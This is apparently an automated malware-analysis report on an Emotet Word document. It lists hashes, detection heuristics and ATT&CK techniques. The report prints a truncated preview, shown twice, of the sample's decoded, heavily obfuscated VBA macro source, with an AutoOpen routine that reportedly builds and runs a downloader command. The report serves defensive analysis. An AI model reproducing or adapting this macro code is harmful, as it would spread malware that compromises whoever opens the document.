Emotet Office (OLE) malware analysis — malicious · c2064bf8c84ee9b8

MALICIOUS

Office (OLE)

117.8 KB Created: 2018-09-26 15:00:00 Authoring application: Microsoft Office Word First seen: 2018-10-19

MD5: 3f1677ec9208e04769ec7ff29610de69 SHA-1: 641edf8ca2abbf97d7d4a9a9b9e5d9c45f2ec65e SHA-256: c2064bf8c84ee9b8d826b4bc4289f3420f87db255d2add113be47e28922a8c66

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic indicating a Shell() call within its VBA macros, and ClamAV identifies it as Doc.Downloader.Emotet-6826497-0. The AutoOpen macro is present, suggesting it executes automatically upon opening. The primary function appears to be downloading and executing a second-stage payload, consistent with Emotet's behavior.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6826497-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826497-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 81760 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	81760 bytes
SHA-256: `408d1755faed3e74845d01f2a2280f29d72085670154d51e2ae8f470beba31d2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "isAZnTMVqjUrL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim DzncOb(2) DzncOb(0) = MidB(BGWcsR + CwhErJlBlURMIEEPjjrQ + MtOiCqu, 190, 18) + Left(HwmFpCb + AIsUnnBXYLiiEvGwv + MXHbF, 354) DzncOb(1) = Left(iPnGkEAu + CsmcawnHBuvdhhVMLSVsdt + OjZDAOUs, 627) + Mid(wLoaKIw + GYqIihfhAIiivhzuhI + YLYBX, 851, 201) + Left(KIopsQY + IKfMCSJicKECdSzFjIT + dXVMiD, 325) + MidB(zAiVLJG + NhYaIXSZTSmaOjiwzjbL + EdmBHnz, 772, 15) Dim EAQdRb(1) EAQdRb(0) = MidB(ERmwru + DKitlHPiwslGOcJnwJOTVH + sBHQRnp, 722, 224) + Left(szkmQUj + ppPGiniorNZXcFjazQ + SNRpMX, 970) Dim zXbwjr(1) zXbwjr(0) = Left(IHaPcAwm + XtzNvZzzIEpbjCDQkd + oPZHq, 237) + MidB(OHunjq + CwjkHjTuAZztVkmIwWRJkv + hhsjMQbO, 775, 882) Dim FvtMqm(1) FvtMqm(0) = Mid(tXivtio + mwoUtmwQMhRGznDCcF + iLzJzzpi, 535, 430) + MidB(vFiLJ + ZZjKmQvFimcfGJwcz + iFvcuWu, 176, 843) + MidB(ttYBBKh + kzptzuwVPhvHbOJhtBwm + lacEHlvP, 49, 823) + Right(BdMcvn + mmvhaBzpznMvHRtNdm + HHLNf, 403) Dim mcrCmB(2) mcrCmB(0) = MidB(AHzUs + XMJKoIXtYztRRptazW + qEwPwJ, 616, 941) + MidB(XSzOnK + jiipHQavHaRtXpGptajj + ZtzbwC, 672, 950) mcrCmB(1) = Left(DqAwiWW + WIaAcHhUkozwDSuzzErT + mBSKGWD, 427) + MidB(OwtWT + ONunFmNMbXOUiQqFdWN + dqwDjcY, 608, 968) + MidB(GPwjOjw + jHnbZidfXwAzJKiijDrPkA + TJqta, 369, 349) + Right(DXdBzs + ldGFmSaRLrpsrjKVXdX + FpLRAcj, 211) jCsahquHk (KeyString(DOqoPdzG + KqGcfJ + 20 + 15 + 32 + mVnwEBl + jTwakz) + QGIQzOf + TwviIpt + KeyString(UEEJpD + Qnrza + 23 + 17 + 37 + wODmKoG + XioWn) + fdkIw + IbZwWdaEsLJ + VABcR + dSIbdF + RwXzbjAYTdW + IGwFlKbaqw + kmrCBU + KiIwf + VjvaCCW) Dim PFKBa(1) PFKBa(0) = MidB(GhnZOZ + ZtfCMrOWPstqFBrLPPGEh + BRrWP, 910, 269) + Right(JXTHK + omiFiAfnXOGPTpDpzkzAwf + sjRkA, 280) + Left(SzGbAl + rjHBhUZDUDsollwnCWn + dBWwlcoM, 557) + Mid(QYYXY + jfLtcjNhEwFMESjzbqbj + XdVAjY, 275, 911) Dim itUJUW(2) itUJUW(0) = MidB(aXNjVS + ZkZGhcIPBcvwvMsHtIL + ziTZjTC, 329, 152) + MidB(iSkRLR + TuDRiaRTKnBORvHCZvzLnqT + bbwcwRA, 684, 911) + MidB(zRzZGUI + WcOLOzTjQaOHAOLEwRLM + CHwZES, 662, 198) + MidB(zMkNK + AfmVsdHsJDMvKwLfBui + EAjsndzu, 566, 711) itUJUW(1) = Left(DtJdoAM + zLwjnnBSmWhtQslOLJjK + VDCBMtR, 781) + MidB(pkJAp + LwpzJcjZPwzVzzRkz + sEsfJ, 47, 254) + Mid(YPtYLKj + kVmiTrsomJiFwmFHiSPTUi + bqpnQFK, 292, 154) + MidB(lBmQNa + TSHSEbhHUCSJRDzzscv + mswFrCB, 860, 473) Dim PTXkN(2) PTXkN(0) = MidB(CuFANs + NOaCaXdfMaVqFtZmuz + lEEtnY, 732, 595) + MidB(VonSVA + qsYnShwwGoGwXhwWizEthU + RfrXYD, 318, 133) PTXkN(1) = Right(wlXwLcfq + zGndWijmwqSfvFiP + RuIpNwi, 735) + Left(qUqXKr + uzkUojZLRPWwbjMinJfW + kzwVn, 404) Dim jjjYq(1) jjjYq(0) = MidB(JkOXE + IAqbfwFziFDrjjKfwjjoH + mRvcrSZX, 860, 667) + Left(PiBjMFT + YaEiNZFOMjUpLnmmdUnAzz + wzXjoTzO, 838) End Sub Attribute VB_Name = "hUEwwFIJnmQWF" Function fdkIw() awcJzutpjwn = "d / // /\\ \\/" + "\ /V/C" + """" + "set *+=2a" + "70 720a 2a70 720a " + "a207 207a 20a7 0" + "a27 7a02 2a70" + " 02a7 02a7 " bKfWnNTdbzj = "072a 072a a7" + "02 70a2 270a 720a}7" + "20a}02a7{0a27" Dim KYCRhJ(1) KYCRhJ(0) = MidB(uAofSli + rDdRIHHRUAlOpwbLaqbWk + tJfJF, 101, 801) + MidB(zRVCRaJP + vfLljVWSZPhGOTcIOv + uGhbY, 894, 7) + Left(hRqWi + nuiXffPZwDGjHaYziwulcS + zbqjf, 903) + Left(TMYdOq + brtAEHszQtAsJGFPzzMXLD + LasCo, 816) Dim moMZj(2) moMZj(0) = MidB(GaXFO + rowmmEsjYDGonOHz + ElANFTAH, 545, 761) + MidB(oFzsU + nzclijDSmIwQnDvZjs + GkwaaBo, 916, 889) + Left(YwczWmZ + UTopiaSwuuSkMVAFCdqOTiD + DZmHc, 402) + MidB(vHrziszz + omGzonMEiEVLHtWIm + whEaHF, 378, 720) moMZj(1) = Right(iKOcEE + nPQliavMbzcqwiZpOfNtTmpn + jColJw, 501) + MidB(wiivR + OYkjpmiWUaWwnvvEZKrh + afaPj, 685, 920) + Right(YQDUawY + oYDCLFjANScWqkHDumki + acjaUI, 18) + Mid(saAYTVY + iiEBaSsoUkbEmkcHJfE + uzKbroiV, 739, 20) jKwdnEswG = "h072ac0a72t2a07a72a" + "0c20a7}70a2;a2" + "70k702aa270ae0a7" + "2r07a2b7a02;a270V" + "02a7z207aE" + "2a07$2a07 0a27m7" ... (truncated)

SHA-256: 408d1755faed3e74845d01f2a2280f29d72085670154d51e2ae8f470beba31d2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "isAZnTMVqjUrL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim DzncOb(2)
DzncOb(0) = MidB(BGWcsR + CwhErJlBlURMIEEPjjrQ + MtOiCqu, 190, 18) + Left(HwmFpCb + AIsUnnBXYLiiEvGwv + MXHbF, 354)
DzncOb(1) = Left(iPnGkEAu + CsmcawnHBuvdhhVMLSVsdt + OjZDAOUs, 627) + Mid(wLoaKIw + GYqIihfhAIiivhzuhI + YLYBX, 851, 201) + Left(KIopsQY + IKfMCSJicKECdSzFjIT + dXVMiD, 325) + MidB(zAiVLJG + NhYaIXSZTSmaOjiwzjbL + EdmBHnz, 772, 15)
   Dim EAQdRb(1)
EAQdRb(0) = MidB(ERmwru + DKitlHPiwslGOcJnwJOTVH + sBHQRnp, 722, 224) + Left(szkmQUj + ppPGiniorNZXcFjazQ + SNRpMX, 970)
   Dim zXbwjr(1)
zXbwjr(0) = Left(IHaPcAwm + XtzNvZzzIEpbjCDQkd + oPZHq, 237) + MidB(OHunjq + CwjkHjTuAZztVkmIwWRJkv + hhsjMQbO, 775, 882)
   Dim FvtMqm(1)
FvtMqm(0) = Mid(tXivtio + mwoUtmwQMhRGznDCcF + iLzJzzpi, 535, 430) + MidB(vFiLJ + ZZjKmQvFimcfGJwcz + iFvcuWu, 176, 843) + MidB(ttYBBKh + kzptzuwVPhvHbOJhtBwm + lacEHlvP, 49, 823) + Right(BdMcvn + mmvhaBzpznMvHRtNdm + HHLNf, 403)
   Dim mcrCmB(2)
mcrCmB(0) = MidB(AHzUs + XMJKoIXtYztRRptazW + qEwPwJ, 616, 941) + MidB(XSzOnK + jiipHQavHaRtXpGptajj + ZtzbwC, 672, 950)
mcrCmB(1) = Left(DqAwiWW + WIaAcHhUkozwDSuzzErT + mBSKGWD, 427) + MidB(OwtWT + ONunFmNMbXOUiQqFdWN + dqwDjcY, 608, 968) + MidB(GPwjOjw + jHnbZidfXwAzJKiijDrPkA + TJqta, 369, 349) + Right(DXdBzs + ldGFmSaRLrpsrjKVXdX + FpLRAcj, 211)
jCsahquHk (KeyString(DOqoPdzG + KqGcfJ + 20 + 15 + 32 + mVnwEBl + jTwakz) + QGIQzOf + TwviIpt + KeyString(UEEJpD + Qnrza + 23 + 17 + 37 + wODmKoG + XioWn) + fdkIw + IbZwWdaEsLJ + VABcR + dSIbdF + RwXzbjAYTdW + IGwFlKbaqw + kmrCBU + KiIwf + VjvaCCW)
   Dim PFKBa(1)
PFKBa(0) = MidB(GhnZOZ + ZtfCMrOWPstqFBrLPPGEh + BRrWP, 910, 269) + Right(JXTHK + omiFiAfnXOGPTpDpzkzAwf + sjRkA, 280) + Left(SzGbAl + rjHBhUZDUDsollwnCWn + dBWwlcoM, 557) + Mid(QYYXY + jfLtcjNhEwFMESjzbqbj + XdVAjY, 275, 911)
   Dim itUJUW(2)
itUJUW(0) = MidB(aXNjVS + ZkZGhcIPBcvwvMsHtIL + ziTZjTC, 329, 152) + MidB(iSkRLR + TuDRiaRTKnBORvHCZvzLnqT + bbwcwRA, 684, 911) + MidB(zRzZGUI + WcOLOzTjQaOHAOLEwRLM + CHwZES, 662, 198) + MidB(zMkNK + AfmVsdHsJDMvKwLfBui + EAjsndzu, 566, 711)
itUJUW(1) = Left(DtJdoAM + zLwjnnBSmWhtQslOLJjK + VDCBMtR, 781) + MidB(pkJAp + LwpzJcjZPwzVzzRkz + sEsfJ, 47, 254) + Mid(YPtYLKj + kVmiTrsomJiFwmFHiSPTUi + bqpnQFK, 292, 154) + MidB(lBmQNa + TSHSEbhHUCSJRDzzscv + mswFrCB, 860, 473)
   Dim PTXkN(2)
PTXkN(0) = MidB(CuFANs + NOaCaXdfMaVqFtZmuz + lEEtnY, 732, 595) + MidB(VonSVA + qsYnShwwGoGwXhwWizEthU + RfrXYD, 318, 133)
PTXkN(1) = Right(wlXwLcfq + zGndWijmwqSfvFiP + RuIpNwi, 735) + Left(qUqXKr + uzkUojZLRPWwbjMinJfW + kzwVn, 404)
   Dim jjjYq(1)
jjjYq(0) = MidB(JkOXE + IAqbfwFziFDrjjKfwjjoH + mRvcrSZX, 860, 667) + Left(PiBjMFT + YaEiNZFOMjUpLnmmdUnAzz + wzXjoTzO, 838)
End Sub


Attribute VB_Name = "hUEwwFIJnmQWF"
Function fdkIw()
awcJzutpjwn = "d / // /\\ \\/" + "\ /V/C" + """" + "set *+=2a" + "70 720a 2a70 720a " + "a207 207a 20a7 0" + "a27 7a02 2a70" + " 02a7 02a7 "
bKfWnNTdbzj = "072a 072a a7" + "02 70a2 270a 720a}7" + "20a}02a7{0a27"
Dim KYCRhJ(1)
KYCRhJ(0) = MidB(uAofSli + rDdRIHHRUAlOpwbLaqbWk + tJfJF, 101, 801) + MidB(zRVCRaJP + vfLljVWSZPhGOTcIOv + uGhbY, 894, 7) + Left(hRqWi + nuiXffPZwDGjHaYziwulcS + zbqjf, 903) + Left(TMYdOq + brtAEHszQtAsJGFPzzMXLD + LasCo, 816)
   Dim moMZj(2)
moMZj(0) = MidB(GaXFO + rowmmEsjYDGonOHz + ElANFTAH, 545, 761) + MidB(oFzsU + nzclijDSmIwQnDvZjs + GkwaaBo, 916, 889) + Left(YwczWmZ + UTopiaSwuuSkMVAFCdqOTiD + DZmHc, 402) + MidB(vHrziszz + omGzonMEiEVLHtWIm + whEaHF, 378, 720)
moMZj(1) = Right(iKOcEE + nPQliavMbzcqwiZpOfNtTmpn + jColJw, 501) + MidB(wiivR + OYkjpmiWUaWwnvvEZKrh + afaPj, 685, 920) + Right(YQDUawY + oYDCLFjANScWqkHDumki + acjaUI, 18) + Mid(saAYTVY + iiEBaSsoUkbEmkcHJfE + uzKbroiV, 739, 20)
jKwdnEswG = "h072ac0a72t2a07a72a" + "0c20a7}70a2;a2" + "70k702aa270ae0a7" + "2r07a2b7a02;a270V" + "02a7z207aE" + "2a07$2a07 0a27m7"

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.